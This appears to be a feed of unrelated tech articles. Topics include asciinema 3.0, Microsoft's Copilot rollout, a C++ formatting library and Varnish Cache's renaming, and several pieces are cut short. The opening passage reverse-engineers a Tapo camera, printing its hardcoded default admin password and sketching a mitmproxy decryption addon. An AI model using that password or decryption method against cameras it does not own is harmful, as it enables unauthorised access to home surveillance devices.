call. Following this function up the chain, we hit gold:
We already know
that the device is using
encrypt_type: 3
, so that means our default password is:
TPL075526460603
Teaching mitmproxy new tricks
With the default password now revealed, we have the cards in our hand to derive session keys and decode the
securePassthrough
messages.
The only thing that would help us further is if we had a reference implementation for the authentication flow. This is where
PyTapo
really came in handy.
Using PyTapo as a reference, we could dump the session state and encrypted messages from mitmproxy and write a script to do some static analysis on the decrypted requests and responses, but a really cool feature of
mitmproxy
is that it supports scripting itself.
What this means is that we can pass a python script to mitmproxy, and have it directly decrypt request and response payloads inline whilst running a capture.
So I wrote
tapo_decrypt_pretty.py
which:
Watches for the login handshake (
cnonce
,
nonce
,
device_confirm
)
Derives
lsk
/
ivb
session keys from it
Transparently decrypts subsequent API calls
Pretty-prints them inline in mitmproxy’s UI in
request_decrypted
and
response_decrypted
fields
Dumps them to JSON files for later analysis
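For readers unfamiliar with mitmproxy's scripting API: an addon is just a Python object whose request/response hooks mitmproxy invokes for every flow. A stripped-down sketch of that structure (the Tapo-specific key derivation and AES calls are omitted, and all names besides the mitmproxy hooks are placeholders, not the real script):

import json
from mitmproxy import http

class TapoDecrypt:
    def __init__(self):
        self.lsk = None  # session key, derived from the login handshake
        self.ivb = None  # IV block, derived alongside it

    def response(self, flow: http.HTTPFlow) -> None:
        # Watch for the login handshake: extract cnonce/nonce/device_confirm
        # from the request/response pair and derive lsk/ivb here (omitted).
        pass

    def request(self, flow: http.HTTPFlow) -> None:
        body = json.loads(flow.request.get_text() or "{}")
        if body.get("method") == "securePassthrough" and self.lsk:
            # AES-decrypt body["params"]["request"] with lsk/ivb (omitted),
            # then attach the plaintext to the flow for display and dumping.
            pass

addons = [TapoDecrypt()]

Passing such a script via mitmproxy -s makes the hooks fire inline while the capture runs.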
Analysing the results
The complete list of calls made by the Tapo app during onboarding were:
changeAdminPassword
— change from default password to the cloud password
connectAp
— join the selected Wi-Fi access point
Everything else was fluff: timezones, record plans, binding to cloud.
Final thoughts
In the end, the prize for all this nonsense was a scrappy little Bash script,
tapo_onboard.sh
, which:
Logs in with the default admin password,
Scans and selects a Wi-Fi access point,
Switches off the obnoxious OSD logo on the camera feed,
Enables RTSP/ONVIF capabilities,
Changes the admin password,
And finally joins the Wi-Fi.
Peeling this onion left me with a few observations on Tapo’s firmware.
Some endpoints use SHA-256 for hashing, while others cling to MD5 like it’s 2003.
There are
two
public keys used to send passwords to the device — one that is shared with the client and another super secret one that’s hardcoded in the app. The easiest way to figure out which one to use is to flip a coin.
Password syncing between the app and its managed devices is strictly vibe-based.
The whole thing feels like it was cobbled together by a consortium of couch-cryptographers. But then again, it was the cheapest indoor camera on Amazon, so what did I expect?
And with all this said I did finally manage to figure out what the dog does when I am away.
She sleeps. On the sofa. Sometimes even in her bed.
Asciinema CLI 3.0 rewritten in Rust, adds live streaming, upgrades file format
I’m happy to announce the release of asciinema CLI 3.0!
This is a complete rewrite of asciinema in Rust, upgrading the recording file
format, introducing terminal live streaming, and bringing numerous improvements
across the board.
In this post, I’ll go over the highlights of the release. For a deeper overview
of new features and improvements, see the
release
notes
and the
detailed
changelog
.
First, let’s get the Rust rewrite topic out of the way. I did it because I felt
like it. But seriously, I felt like it because I prefer working with Rust 100x
more than with Python these days. And this type of code, with syscalls and
concurrency, is way easier to deal with in Rust than in Python. That’s my
experience, YMMV. Anyway, in addition to making me enjoy working with this
component of asciinema again, the rewrite resulted in faster startup, easier
installation (a static binary), and made many new features possible by
integrating
asciinema virtual terminal
(also Rust) into the CLI.
Let’s look at what’s cool and new now.
asciicast v3 file format
The new
asciicast v3
file
format is an evolution of the good old asciicast v2. It addresses several
shortcomings of the previous format that were discovered over the years.
The major change in the new format is the use of intervals (deltas) for timing
session events. v2 used absolute timestamps (measured since session start),
which had its own pros and cons. One often-brought-up issue was the difficulty
of editing the recordings - timestamps of all following events had to be
adjusted when adding/removing/updating events.
Other than timing, the header has been restructured, grouping related things
together, e.g. all terminal-related metadata is now under
term
. There’s also
support for the new
"x"
(exit) event type, for storing the session exit
status. Finally, line comments are allowed by using the
#
character as the
first character on a line.
Here’s an example of a short recording in asciicast v3 format:
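(Illustrative sketch with made-up values, based on the properties described above; the format docs linked from the release notes are authoritative.)

{"version": 3, "term": {"cols": 80, "rows": 24}, "timestamp": 1758000000}
# comment lines like this one are now allowed
[0.25, "o", "hello "]
[1.0, "o", "world\r\n"]
[0.1, "x", "0"]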
The new CLI allows for live streaming of terminal sessions, and provides two
modes for doing so.
Local mode uses a built-in HTTP server, allowing people to view the stream on
trusted networks (e.g. a LAN). In this mode no data is sent anywhere, except to
the viewers’ browsers, which may require opening a firewall port. The CLI
bundles the latest version of asciinema player, and uses it to connect to the
stream from the page served by the built-in server.
$ asciinema stream --local
::: asciinema session started
::: Live streaming at http://127.0.0.1:37881
::: Press <ctrl+d> or type 'exit' to end
$ _
Remote mode publishes the stream through an asciinema server (either
asciinema.org or a self-hosted one), which acts as a relay, delivering the
stream to the viewers at a shareable URL.
$ asciinema stream --remote
::: asciinema session started
::: Live streaming at https://asciinema.org/s/TQGS82DwiBS1bYAY
::: Press <ctrl+d> or type 'exit' to end
$ _
The two modes can be used together as well.
Here’s a live stream of
btop
running on one of the asciinema.org servers:
Read more about the streaming architecture and supported protocols
here
.
asciinema player (seen above) supports all the described protocols. To make the
viewing experience smooth and glitch-free, it implements an adaptive buffering
mechanism. It measures network latency in real-time and adjusts the buffer size
constantly, aiming for a good balance between low latency and buffer-underrun
protection.
asciinema server can now record every live stream and turn it into a regular
recording. At the moment, asciinema server running at asciinema.org has stream
recording disabled and a concurrent live stream limit of 1, but you can
self-host the server where recording is enabled and there’s no concurrent
stream limit by default. The limits on asciinema.org may change. I’d like to
first see how the streaming feature affects resource usage (btw, shout-out to
Brightbox
, which provides cloud services for
asciinema.org).
Local-first
In the early versions of asciinema,
asciinema rec
didn’t support saving to a
file - the recording was saved to a tmp file, uploaded to asciinema.org, and
the tmp file was removed. Later on, the CLI got the ability to specify a
filename, which allowed you to save the result of a recording session to a file
in asciicast v1 format and decide whether you want to keep it local only or
publish.
Although optional, the filename argument had long been available. However,
many, many tutorials on the internet (probably including asciinema’s own docs)
showed examples of recording and publishing in one go with
asciinema rec
.
That was fine - many people loved this short path from recording to sharing.
Over the years, I started seeing two problems with this. The first one is that
lots of people still think you must upload to asciinema.org, which is not true.
You can save locally and nothing leaves your machine. The second one is that
the optionality of the filename made it possible to unintentionally publish a
recording, and potentially leak sensitive data. And it’s a completely valid
concern!
Because of that, on several occasions I’ve seen negative comments saying
“asciinema is shady” /m\. It was never shady. It’s just a historical thing. I
just kept the original behavior for backward compatibility. asciinema.org is
not a commercial product - it’s an instance of asciinema server, which is
meant to give users an easy way to share, and to give a taste of what you get
when you self-host the server. In fact, I encourage everyone to self-host it,
as the recordings uploaded to asciinema.org are a liability for me (while being
a good promotion of the project :)).
I hope this clears up any confusion and suspicion.
Anyway, many things have changed since the original behavior of
asciinema rec
was implemented, including my approach to sharing my data with cloud
services. These days I self-host lots of services on a server at home, and I
try to avoid cloud services if I can (I’m pragmatic about it though).
The streaming feature was built from the ground up to support the local mode,
which came first, and the remote mode followed.
In asciinema CLI 2.4, released 2 years ago, I made the
upload
command show a
prompt where you have to explicitly make a decision on what to do with the
recording. It looked like this:
$ asciinema rec
asciinema: recording asciicast to /tmp/tmpo8_612f8-ascii.cast
asciinema: press <ctrl-d> or type "exit" when you're done
$ echo hello
hello
$ exit
asciinema: recording finished
(s)ave locally, (u)pload to asciinema.org, (d)iscard
[s,u,d]? _
It was a stopgap and a way to prepare users for further changes that are coming
now.
In 3.0, the filename is always required, and the
rec
command no longer has
upload capability. To publish a recording to asciinema.org or a self-hosted
asciinema server, use the explicit
asciinema upload <filename>
.
More self-hosting-friendly
A related improvement introduced in this release is the new server URL prompt.
When using a command that integrates with asciinema server (
upload
,
stream
,
auth
) for the first time, a prompt is shown, pre-filled with
https://asciinema.org
(for convenience). This lets you choose an asciinema
server instance explicitly and intentionally. The choice is saved for future
invocations.
It was always possible to
point the CLI to another asciinema
server
with a config
file or environment variable, but this new prompt should come in handy
especially when running the CLI in a non-workstation/non-laptop yet interactive
environment, such as a fresh VM or a dev container.
This change should make it easier to use the CLI with your own asciinema
server, and at the same time it doubles as an additional guard preventing
unintended data leaks (to asciinema.org).
Summary
I’m really excited about this release. It’s been in the making for a while, but
it’s out now, and I’m looking forward to seeing what new use-cases and
workflows people will discover with it.
It’s going to take a moment until 3.0 shows up in package repositories for all
supported platforms/distros. Meanwhile, you can download prebuilt binaries for
GNU/Linux and macOS from the
GitHub
release
, or
build
it from source
.
Thanks for reading to this point!
Did you like it? Feel free to send me an email with your feedback to
. You can also reach me on Mastodon at
@ku1ik@hachyderm.io
.
Thanks!
Microsoft to force install the Microsoft 365 Copilot app in October
Bleeping Computer
www.bleepingcomputer.com
2025-09-15 16:59:23
Next month, Microsoft will begin automatically installing the Microsoft 365 Copilot app on Windows devices that have the Microsoft 365 desktop client apps. [...]...
Next month, Microsoft will begin automatically installing the Microsoft 365 Copilot app on Windows devices that have the Microsoft 365 desktop client apps.
The Microsoft 365 Copilot app integrates the AI-powered Copilot assistant with Microsoft 365 suite apps, including Word, Excel, and PowerPoint, as well as other features like Notebooks and AI agents.
While the newly installed app will be added to the Windows Start Menu and enabled by default, IT administrators responsible for managing Microsoft 365 app deployments will be able to opt out in the Apps Admin Center.
Redmond also advised admins to notify their organizations' helpdesk teams and users before the app is forcibly installed on their devices "to reduce confusion and support requests."
The rollout will start in early October and be completed by mid-November; however, the Microsoft 365 Copilot app will not be installed on systems within the European Economic Area (EEA).
"Starting in October 2025, Microsoft will begin automatically installing the Microsoft 365 Copilot app on Windows devices that have Microsoft 365 desktop client apps," the company said in a
Microsoft 365 message center update
on Friday.
"This app provides a centralized entry point for accessing Copilot experiences and AI-powered capabilities across Microsoft 365. This change simplifies access to Copilot and ensures users can easily discover and engage with productivity-enhancing features."
Many users may notice a new Microsoft 365 Copilot app icon in the Start menu; on systems where the application was already installed, there will be no apparent change.
Last month, as part of the same effort to make Copilot more easily available, Microsoft
announced
that it will integrate Microsoft 365 Copilot agents into the Edge sidebar starting in late September 2025, allowing users to access them while using Copilot.
Weeks earlier, it
added a new setting
that allows Microsoft 365 admins to pin the Microsoft 365 Copilot app to the Windows taskbar.
Leaders of Vienna, an Oasis of Affordable Housing, Tour NYC’s Grim Offerings
hellgate
hellgatenyc.com
2025-09-15 16:53:55
Austrian Vice Chancellor Andreas Babler had some advice for New York lawmakers after seeing the city's rent-stabilized apartments up close....
On a recent Monday afternoon, the vice chancellor of Austria, Andreas Babler, peered up at a hole in the sagging ceiling of a dark, unrented South Williamsburg apartment crowded with abandoned furniture and dusty suitcases.
In this write-up, I will walk you through an implementation of a string formatting library for C++ I came up with for my video game.
The end result came out really compact, at only 65 lines of code—providing a skeleton that can be supplemented with additional functionality at low cost.
Usage
Given a format buffer…
char str[64];
String_Buffer buf = {str, sizeof str};
…the
fmt::format
function provided by this library can be called with a format string parameter, containing the character sequence
{}
(a
hole
) where parameters are to be substituted, as well as the parameters themselves.
In case the buffer is not sufficiently large to contain the full string, the function writes as many characters as it can, and sets the
String_Buffer
’s
len
variable to the amount of characters required.
That way, it is possible for the caller to tell if the buffer has been exhausted, and reallocate it to an appropriate size.
Additional functions can be written on top of this base functionality to improve ergonomics in real-world code.
These are included in
Ergonomic functions
.
Problem statement
A string formatting library consists of a single function
format
.
You give the function a
format string
, which describes the output shape, as well as a set of
format parameters
, which the function then substitutes into the format string, rendering them in a human-readable way.
The
format
function ought to write to a pre-allocated buffer of characters.
This is a choice made in favour of simplicity: writing to a pre-allocated buffer can fail, but compared to arbitrary I/O, there is only one failure mode: the buffer is exhausted.
Naturally, this cannot work in memory-constrained environments, such as embedded devices—where you would want to write to a small buffer and flush it in a loop to reduce memory usage—but this does not apply in the context of a desktop video game.
As already mentioned in the usage overview, if the buffer is full, the function should return the number of characters that
would
have been written, had the buffer capacity not been exceeded—such that the caller can choose to reallocate the backing buffer to an appropriate size, and try formatting again.
There
has
to be a format string.
An example of a format string-less API is C++’s
<iostream>
.
Instead of having a format string like
printf
,
<iostream>
opts to use overloads of
operator<<
to write to the output.
This has the disadvantage of not being greppable (which is useful for debugging error logs), as well as not being localisable (because there is no format string that could be replaced at runtime).
Additionally, I don’t want the format string to have extra specifiers such as C’s
%d
,
%x
, etc. specifying the type of output, or Python’s
{:.3}
, for specifying the style of output. The C approach is error-prone and inextensible, and the Python approach, while convenient, increases parser complexity and reduces greppability.
Instead, the representation is defined only according to the formatted value’s type.
It has to have a small footprint.
There exist plenty of string formatting libraries for C++, such as
{fmt}
, or even the recently introduced
std::print
, but they suffer from gigantic compile-time complexity through their heavy use of template metaprogramming.
While my compilation time benchmark results for {fmt} weren’t as dire as those presented
in their README
, they still don’t paint a pretty picture—with a simple program using
printf
taking ~35 ms to compile, and the equivalent program using {fmt} taking ~200 ms.
I also find the benefits of an open rather than closed API, as well as compile-time checked format strings, dubious. Instead, I want something lean and small, using basic features of the language, and easy enough to drop into your own project, then extend and modify according to your needs—in spirit of
rxi’s simple serialisation system
.
We will start by defining the
String_Buffer
type, which also serves as the formatter’s state.
It represents a user-provided string buffer with a capacity and a length.
A
String_Buffer
is intended to be initialised via aggregate initialisation (
{str, cap}
.)
This mimics the
snprintf
API, which accepts its buffer and size arguments in the same order.
At the core of the library’s output is
write
.
It performs a bounds-checked write of a string with known length to the output string buffer.
void write(String_Buffer &buf, const char *str, int len)
{
    int remaining_cap = buf.cap - buf.len - 1; // leave one byte for NUL
    int write_len = len > remaining_cap ? remaining_cap : len;
    if (write_len > 0)
        memcpy(buf.str + buf.len, str, write_len);
    buf.len += len;
}
My implementation truncates the output if the buffer size is exhausted, but keeps incrementing the buffer’s
len
past
cap
, such that the caller can know the full number of characters written after all
write
s, and adjust accordingly.
This is a deliberate choice coming from the fact that
String_Buffer
does not own the buffer’s allocation, and the fact that string formatting is a performance-sensitive piece of code, which will be called often in the game loop.
However, it is trivial to replace the length saturation logic with a call to
realloc
, should that be the more appropriate choice.
Having this base
write
function, we can implement a set of overloaded functions that will write out values of various types to the string buffer.
These functions will be used by our
format
function, to write out format arguments.
The set of functions implemented here directly corresponds to the types of arguments you’ll be able to pass into
format
.
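As an illustration, the overload for C strings can simply defer to write (a sketch; the article's full listing may differ in details):

#include <cstring>

// String overload: measure the string, then do a bounds-checked write.
void write_value(String_Buffer &buf, const char *value)
{
    write(buf, value, (int)strlen(value));
}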
Format strings can be defined as a sequence of
literals interspersed with arguments
.
That is, a format string always takes the form:
fstr = { literal, hole }, literal;
The leading and trailing
literal
can be the empty string.
The task of processing the literal parts is done by a function called
next_hole
.
It parses the format string, looking for a character sequence representing a hole
{}
, and writes the string preceding the hole
{}
to the output buffer.
fstr
is received as a reference to a pointer, representing the format string’s parsing state.
A call to
next_hole
will write out the literal part, visualised with
---
, and leave the
fstr
pointer past the hole
{}
, visualised with
^
.
Hello, {}!
------- ^
In this case, it will return
true
to signal that it stopped at a hole.
In case there is no hole however, and the end of the string is reached, it will return
false
.
Hello, {}!
-^ end of string
Additionally, we handle the {{ escaping case. When { is encountered directly after another {, we have to flush the current literal, and start a new one directly after the first {. Underlined with --- are the spans of characters that get written to the output.
empty {{} hole
------- ------
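Putting that behaviour together, a sketch of next_hole might look like this (illustrative, assuming the String_Buffer and write defined earlier; the article's actual listing may differ):

// Writes the literal up to the next "{}" to buf and advances fstr past it,
// returning true; at the end of the string, flushes the remaining literal
// and returns false. "{{" escapes a literal '{'.
bool next_hole(String_Buffer &buf, const char *&fstr)
{
    const char *start = fstr;
    while (*fstr) {
        if (fstr[0] == '{' && fstr[1] == '{') {
            write(buf, start, (int)(fstr - start + 1)); // flush up to and including the first '{'
            fstr += 2;    // skip the escape pair
            start = fstr; // new literal starts after the first '{'
        } else if (fstr[0] == '{' && fstr[1] == '}') {
            write(buf, start, (int)(fstr - start)); // flush the literal before the hole
            fstr += 2;    // leave fstr pointing past the hole
            return true;
        } else {
            fstr++;
        }
    }
    write(buf, start, (int)(fstr - start)); // flush the trailing literal
    return false;
}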
Finally, we define
format
: the function that accepts a format string, a set of arguments, and inserts them into the output string.
It makes use of an additional function
format_value
, which tries to find the next hole, and if found, writes out a format argument in its place.
For those unfamiliar with C++ template metaprogramming,
(format_value(buf, fstr, args), ...)
is a
fold expression
.
Given any number of
args
, it will expand into a sequence of calls to
format_value
, one for each element in
args
, separated by the
,
operator. For example, if two arguments: a
const char*
and an
int
, are passed into
format
:
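The pair might be sketched like this (simplified; the NUL-termination at the end is my assumption about what the spare byte reserved in write is for):

template <typename T>
void format_value(String_Buffer &buf, const char *&fstr, const T &value)
{
    if (next_hole(buf, fstr)) // stopped at a hole: substitute the argument
        write_value(buf, value);
}

template <typename... Args>
void format(String_Buffer &buf, const char *fstr, const Args &...args)
{
    (format_value(buf, fstr, args), ...); // one format_value call per argument
    while (next_hole(buf, fstr)) {}       // flush the trailing literal
    buf.str[buf.len < buf.cap ? buf.len : buf.cap - 1] = '\0'; // assumes cap >= 1
}

// With a const char* and an int passed in, the fold expands into:
//   (format_value(buf, fstr, "world"), format_value(buf, fstr, 42));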
Note that the overloads of
write_value
must
be declared before
format_value
.
This is because the
write_value
name is not dependent on any template arguments, and is therefore early-bound at
format_value
’s definition site.
This choice was made for the sake of simplicity, but if it turns out to be a problem, it is possible to use specialisation. It is important to note though that specialisation bypasses overload resolution, so this will not work:
because the type of
"world"
is
char [5]
, and not
const char*
, and
write_value<char [5]>
is deleted.
This should be solvable with some additional work, but I’ve deemed it unnecessary in my case.
In a single .cpp file, together with wrapping all the functionality in a namespace, this implementation, together with the implementation of
write_value
for strings, equates to a mere
65 lines of code
.
In a real project, you will probably want to move some of the private implementation details to a separate .cpp file.
Here’s the full source code listing, split into a header file, and an implementation file.
The choice of
{}
as the hole syntax is not accidental.
I evaluated whether holes could be represented with a single character
%
, like:
fmt::format(buf,"Hello, %!","world");
But it turned out that using only a single character introduces an ambiguity around escaping.
What should this format to:
hello%
, or
%hello
?
fmt::format(buf,"%%%","hello");
It would be possible to use a different, unambiguous combination for escaping, such as
%_
, but it looks very alien, and you have to use it any time you want a
%
sign.
fmt::format(buf,"%%_ complete",33);
Compare this to the current approach, where you only have to double the
{
when it’s directly preceding
}
.
fmt::format(buf,"{}% complete",33);
It also more closely mimics the final output string.
Reading the previous
%%_
example requires knowing that
%_
is a special sequence that turns into
%
, whereas reading this example doesn’t require any extra knowledge (and progress reporting with percentages is a somewhat common use case for format strings).
Iteration through parameter packs
Another idea I had was to do an
<iostream>
-style API, though done with a function call rather than an operator chain:
format(buf,"Hello, ","world!");
The observation about poor greppability didn’t occur to me until later, but it seemed simple enough to implement.
If I went with this approach, it would be even less code, but the poor greppability and non-localisability of format strings kept bugging me, so I started wondering if there’s some way to add that format string.
It seemed impossible, because the format string can be provided at runtime.
This would mean
format
would have to iterate through the format string to parse out the holes
{}
, and when a hole is hit, insert the Nth parameter, starting with 0 for the first hole and N-1 for the last of N holes.
But it
seemed
to require indexing the parameter pack, and
there is no way to index a parameter pack in C++20, and
even in C++26, which adds parameter pack indexing (pack...[x]), there is no way to index it using a runtime value.
A few hours later, I realised it is possible to have
the parameter pack expansion drive the parsing
, rather than driving the parsing from
format
and trying to index the parameter pack.
I think this is single-handedly the most elegant bit of this library.
It generates optimal, extremely minimal code: a sequence of calls to the appropriate overloads of
format_value
.
It handles out-of-bounds gracefully: because there is no indexing of parameters, and therefore no out-of-bounds.
It makes me wonder what other cool things could be done with this technique.
Failed idea: using dynamic typing for format arguments
My initial idea for a minimal C++ formatting library involved a
Format_Argument
type, passed in an
std::initializer_list
to the
format
function.
The API was shaped like this:
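Roughly, the shape was this (a reconstruction, not the original listing; identifiers like player_pos are hypothetical):

void format(String_Buffer &buf, const char *fstr,
            std::initializer_list<Format_Argument> args);

// call site: the braces build the initializer_list of Format_Arguments
format(buf, "Hello, {}! pos = {}", {"world", player_pos});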
This approach has a couple problems though, which were enough of a deal breaker for me that I dropped the idea.
Efficiency.
The size of
Format_Argument
is as large as the biggest value able to be formatted.
In this case, assuming
Vec4
is four 32-bit floats, it is 20 bytes.
This space has to be allocated on the stack for the
initializer_list
.
It is unlikely compilers would be able to optimise all that away, especially if the
format
function lived in a separate object file.
Verbosity.
The example above is actually incomplete.
What
Format_Argument
has
to look like is actually this:
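Again a hedged reconstruction (member names are assumptions), now with the type tag that the size discussion above already accounts for:

struct Format_Argument {
    enum class Type { Int, Float, String, Vec4 } type; // the tag
    union {
        int64_t     i;
        float       f;
        const char *s;
        Vec4        v; // four 32-bit floats
    };
    Format_Argument(int64_t i) : type(Type::Int), i(i) {}
    Format_Argument(float f) : type(Type::Float), f(f) {}
    Format_Argument(const char *s) : type(Type::String), s(s) {}
    Format_Argument(Vec4 v) : type(Type::Vec4), v(v) {}
};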
And then you have to
switch
on the format argument’s
type
in
format_value
, introducing further duplication.
Why not
printf
The elephant in the room.
Why do this when you have
printf
?
The answer to this is: verbosity.
Firstly, there is no way to extend
printf
with your own types in standard C.
I often want to
printf
3D vectors for debugging, and I have to resort to listing out all the axes manually.
Combine this with the inability to use
printf
as an expression, which is particularly painful with ImGui—where I often want to format a window title, or button label.
It is possible to write a function which allocates the temporary buffer and writes to it in one go, akin to
my
fmt::print
function
, but even doing
that
is verbose, as you have to deal with
va_list
—therefore needing two sets of functions, one for variadic arguments
...
and one for
va_list
.
printf
is also error-prone.
It is easy to mess up and use the wrong specifier type, or pass too few arguments to the function.
printf("%x",1.0f);// oopsprintf("%x");// ...not again
This makes it unusable for localisation purposes.
There is also no easy, idiomatic way to concatenate strings written with
snprintf
.
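A representative reconstruction of the naive attempt (buffer size chosen for illustration; the post's original snippet may differ):

#include <cstdio>

char str[6];
int len = snprintf(str, sizeof str, "Hello,"); // stores "Hello\0", but returns 6
snprintf(str + len, sizeof str, " world");     // starts writing at index 6, outside the buffer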
This naive way is not actually correct, because
snprintf
returns the number of characters that
would
be written into
str
, had the buffer been large enough.
Therefore, the second call to
snprintf
in the above example ends up writing past the buffer’s bounds (at index 6.)
Since the base library is very bare-bones, I’m including some additional snippets to help you get it integrated into your project.
For integers, here’s an implementation of
write_value
for
int64_t
.
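A sketch of one way to write it (a reconstruction; the post's own listing may differ):

#include <cstdint>

void write_value(String_Buffer &buf, int64_t value)
{
    char tmp[20]; // enough digits for any 64-bit integer
    uint64_t u = (uint64_t)value;
    if (value < 0) {
        write(buf, "-", 1);
        u = 0 - u; // magnitude; safe even for INT64_MIN
    }
    int n = 0;
    do {
        tmp[n++] = (char)('0' + u % 10);
        u /= 10;
    } while (u != 0);
    for (int i = 0; i < n / 2; i++) { // digits came out least-significant first
        char c = tmp[i];
        tmp[i] = tmp[n - 1 - i];
        tmp[n - 1 - i] = c;
    }
    write(buf, tmp, n);
}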
This can confuse C++’s overload resolution, so I’d recommend adding additional overloads for smaller integers
int8_t
,
int16_t
,
int32_t
, also
long long
, and
ptrdiff_t
, calling into the
int64_t
overload.
A
uint64_t
version can be created in a similar manner, by removing the
if (value < 0)
case near the beginning.
This algorithm works for any radix (base 2, base 8, base 16, …).
In my own implementation, I have a
Format_Hex
newtype, which changes the output to base 16.
For floats, I defer the work onto
snprintf
’s
%g
specifier, because I trust it to do a better job than I ever could, even if a bit slow.
You can also use
Ryu
for this purpose.
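That deferral can be as simple as (a sketch):

#include <cstdio>

void write_value(String_Buffer &buf, double value)
{
    char tmp[32];
    int len = snprintf(tmp, sizeof tmp, "%g", value); // let snprintf pick the representation
    write(buf, tmp, len);
}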
The ergonomics of having to allocate a backing buffer, and then a
String_Buffer
afterwards, can get a bit cumbersome.
To help alleviate this, I have a
Static_String
type, together with a
print
function, which formats to a
Static_String
and returns it:
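A sketch of that pair (the default capacity and member names here are assumptions):

template <int N = 256>
struct Static_String {
    char str[N];
    int  len; // may exceed N if truncated, mirroring String_Buffer's saturation
};

template <int N = 256, typename... Args>
Static_String<N> print(const char *fstr, const Args &...args)
{
    Static_String<N> s = {};
    String_Buffer buf = {s.str, N};
    format(buf, fstr, args...);
    s.len = buf.len;
    return s;
}

Because the result is returned by value, it works as an expression, e.g. as an ImGui label: ImGui::Button(print("{}% complete", pct).str), with pct being whatever integer you have at hand.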
We are all moved by great movies, cinematography, and stories. Watching them is fun because you can imagine yourself resonating with a character. You are thrilled by the tension the story creates and curious how it will be resolved.
Many find software development a dull job where you have to write exactly what your PM or client asks for. It’s exciting at first, but it can become boring after a few iterations.
Whatever doesn’t excite you, change it.
When we, as developers, push ourselves to be protagonists, we discover many problems to solve — a lot of tension to resolve. Here are a few good problems for everyday devs:
Your CI/CD takes a huge amount of time because you forgot to leverage caching.
You forgot to add connection pooling and your service bombarded the database, causing too many open connections.
You misconfigured the garbage collector and now you have a memory leak that keeps growing.
If it takes you more than 3 seconds to understand what you wrote last week, it’s poorly written.
Latency is high for your users in Mumbai because your servers are in Singapore.
The database becomes very slow when you start dumping data in batches.
You want consistent API responses for read operations for users in both Mumbai and Singapore.
These are not trivial problems; they happen every day. These are our villains — irritating, unwanted, and surprising. We should eliminate them.
Pick your fight. This is one way to make your day exciting. If you can’t tackle these at work, do it in your personal projects.
If you chase the right tension, a story will follow.
Launch HN: Trigger.dev (YC W23) – Open-source platform to build reliable AI apps
We provide everything needed to create production-grade agents in your codebase and deploy, run, monitor, and debug them. You can use just our primitives or combine with tools like Mastra, LangChain and Vercel AI SDK. You can self-host or use our cloud, where we take care of scaling for you. Here’s a quick demo: (
https://youtu.be/kFCzKE89LD8
).
We started in 2023 as a way to reliably run async background jobs/workflows in TypeScript (
https://news.ycombinator.com/item?id=34610686
). Initially we didn’t deploy your code, we just orchestrated it. But we found that most developers struggled to write reliable code with implicit determinism, found breaking their work into small “steps” tricky, and they wanted to install any system packages they needed. Serverless timeouts made this even more painful.
We also wanted to allow you to wait for things to happen: on external events, other tasks finishing, or just time passing. Those waits can take minutes, hours, or forever in the case of events, so you can’t just keep a server running.
The solution was to build and operate our own serverless cloud infrastructure. The key breakthrough that enabled this was realizing we could snapshot the CPU and memory state. This allowed us to pause running code, store the snapshot, then restore it later on a different physical server. We currently use Checkpoint Restore In Userspace (CRIU) which Google has been using at scale inside Borg since 2018.
Since then, our adoption has really taken off especially because of AI agents/workflows. This has opened up a ton of new use cases like compute-heavy tasks such as generating videos using AI (Icon.com), real-time computer use (Scrapybara), AI enrichment pipelines (Pallet, Centralize), and vibe coding tools (Hero UI, Magic Patterns, Capy.ai).
Here’s a sneak peek at some upcoming changes: 1) warm starts for self-hosting 2) switching to MicroVMs for execution – this will be open source, self-hostable, and will include checkpoint/restoring.
We’re excited to be sharing this with HN and are open to all feedback!
This coming February 22nd, The Varnish Cache Project will officially
be 20 years old. We consider the first surviving commit from the
subversion-to-git conversion the official birthday of the Project.
This is as good an excuse as any to take stock and make some changes
so we are ready for the next 20 years.
Open Source is not what it used to be: The EU has launched a
broadside of directives against software-related industries, and
while they have gone to great lengths to carve out a niche for Free
and Open Source Software, they have wisely not chosen to make it a
“Get out of jail free” card for slapping a “FOSS” sticker on something.
Concepts like “Maintainers”, “Stewards” and “Contributors” of FOSS
have formal legal definitions now, and we need to find out how we
can and want to fit in.
Which again means we have to find out who makes those kinds of decisions
for the project, both now and in the future.
Many successful FOSS projects have spawned “Foundations” which are
typically tax-exempt benefical/charity corporations in some country
or other, but we have decided to not go there. For one thing, none
of us want to take on such a task, but more importantly: We’re are
less than impressed by how well that model seems to work in practice.
We will instead form a voluntary association, a “Forening”, under
the laws of Denmark, with bylaws that set out what the goal is
(develop, maintain and distribute the software), who gets to make
the decisions (a governing board appointed by the members), who can
become members (anybody but subject to approval by the members) and
that the association cannot ever hold or handle any money.
The commented bylaws of the association will be ratified by the
founders and made public this autumn, and the first general assembly
will be on Monday February 23rd 2026 - hopefully with many membership
applications to approve - more about that when we publish the bylaws.
We will also, at the same time, reluctantly change the name of the project.
The Varnish Cache FOSS software was initiated and sponsored by the
Norwegian newspaper Verdens Gang. They hired a company called
“Linpro” to handle the logistics and me to write the code.
From Linpro grew the company Varnish Software, and if anybody had,
they had earned the right to use “Varnish” in their name commercially.
I was deeply worried about the potential for confusion and line
drawing issues between the commercial entity and the FOSS project,
and as Varnish Software have grown to become a huge international
company, those worries materialized.
I thought I had a verbal agreement with them, that “Varnish Cache”
was the FOSS project and “Varnish Software” was the commercial
entity, but the current position of Varnish Software’s IP-lawyers
is that nobody can use “Varnish Cache” in any context, without their
explicit permission.
The need to get permission from Varnish Software to use our own
name has already deterred some potential contributors and supporters
from engaging with the FOSS project.
We have tried to negotiate with Varnish Software for many months
about this issue, but their IP-Lawyers still insist that Varnish
Software owns the Varnish Cache name, and at most we have been
offered a strictly limited permission, subject to their veto,
for the FOSS project to use the “Varnish Cache” name.
We cannot live with that: We are an independent FOSS project with our own name.
So we will change the name of the project.
The new association and the new project will be named “The Vinyl
Cache Project”, and this release 8.0.0, will be the last under the
“Varnish Cache” name. The next release, in March, will be under the
new name, and will include compatibility scripts to make the
transition as smooth as possible for everybody.
I want to make it absolutely clear that this is 100% a mess of my
making: I should have insisted on a firm written agreement about
the name sharing, but I did not.
I will also state for the record, that there are no hard feelings
between Varnish Software and the FOSS project.
Varnish Software has always been, and still is, an important and
valued contributor to the FOSS project, but sometimes even friends
can make a mess of a situation.
On behalf of the Varnish Cache Project,
Poul-Henning Kamp
2025-08-20 - New releases: 7.7.3, 7.6.5 and 6.0.16
Celebrating the 18th anniversary of Varnish-Cache and the first anniversary of the SLASH/ storage engines today, your Open-Source Varnish-Cache friends from UPLEX have just tagged the first version 1.0.0 candidate of our extension with storage engines (stevedores) and storage routers (loadmasters).
Over the past year, we have received a lot of helpful input from our
users and have implemented substantial improvements. THANK YOU to
